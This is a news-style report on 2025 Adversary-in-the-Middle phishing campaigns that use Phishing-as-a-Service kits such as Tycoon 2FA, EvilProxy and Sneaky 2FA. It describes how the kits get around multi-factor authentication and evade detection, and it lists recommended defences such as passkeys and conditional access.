A surge in Adversary‑in‑the‑Middle phishing attacks exploiting Phishing‑as‑a‑Service frameworks has been recorded in 2025, allowing cybercriminals to systematically bypass multi‑factor authentication and harvest corporate credentials at industrial scale. Researchers from Sekoia and Barracuda warn that tools like Tycoon 2FA, EvilProxy and Sneaky 2FA are being rapidly refined, embedding advanced evasion techniques and automation that make detection increasingly challenging.
AiTM phishing campaigns leverage reverse proxies that intercept login credentials and session cookies in real time. When users enter their password and MFA code, a proxy server relays the information to the legitimate service—such as Microsoft 365 or Google—capturing session tokens in the process. Attackers then replay those tokens to impersonate legitimate users without triggering MFA prompts.
Between January and February, over one million PhaaS‑powered AiTM phishing attempts were blocked globally, with Tycoon 2FA accounting for nearly 90 % of the incidents. EvilProxy and Sneaky 2FA contributed around 8 % and 3 % respectively. Tycoon 2FA has evolved markedly: its credential‑stealing scripts now employ Caesar‑cipher encryption, invisible Hangul filler characters, AES encryption, and browser fingerprinting to tailor the attack and evade detection.
EvilProxy, in contrast, offers ease of deployment, enabling even actors with limited expertise to launch fully automated AiTM campaigns against cloud platforms by mimicking legitimate page source code and proxying credentials live.
Sneaky 2FA, meanwhile, uses Telegram‑based bots and clever URL structures to pre‑populate phishing forms with user email addresses, redirect non‑target users to innocuous sites, and selectively deliver phishing pages only to likely victims. It also embeds tracking codes that reinforce its selective targeting.
Darktrace analysts cite real‑world incidents where attackers abused legitimate platforms—such as Milanote—to deliver Tycoon 2FA phishing lures. This misuse of trusted resources bypasses traditional defences like email gateways, which often cannot distinguish between benign and malicious content. SC Media likewise highlights Sneaky Log’s Messenger‑driven delivery mechanism and anti‑sandbox filters—including blurred backgrounds and redirects to Wikipedia—making detection by anti‑phishing tools very difficult.
Microsoft’s threat intelligence team reports other AiTM vectors such as OAuth‑consent and device‑code phishing. While these attacks exploit legitimate login flows—often via QR codes or OAuth prompts—they similarly bypass MFA using session token theft and abuse of authentication flows.
Threat actors ultimately deploy AiTM access to conduct Business Email Compromise, financial scams, internal reconnaissance, or onward phishing. They frequently install persistent controls—including email forwarding rules and additional MFA factors—to prolong intrusions.
Defensive responses emphasise layered security. Organisations are urged to deploy AI‑powered email defences, anomaly detection within identity logs, real‑time URL scanning, phishing‑resistant credentials like FIDO2 or passkeys, and contextual Conditional‑Access policies based on location or device status. Endpoint‑level inspection, token anomaly monitoring, and pre‑click URL analysis—particularly to bypass proxies like Cloudflare Turnstile—are also advised.
Academic research echoes the urgency for adaptive defences: LLM‑based multi‑agent systems like MultiPhishGuard and fuzzy‑logic frameworks offer promising ways to detect adversarial phishing content while maintaining transparency and low false‑positive rates.
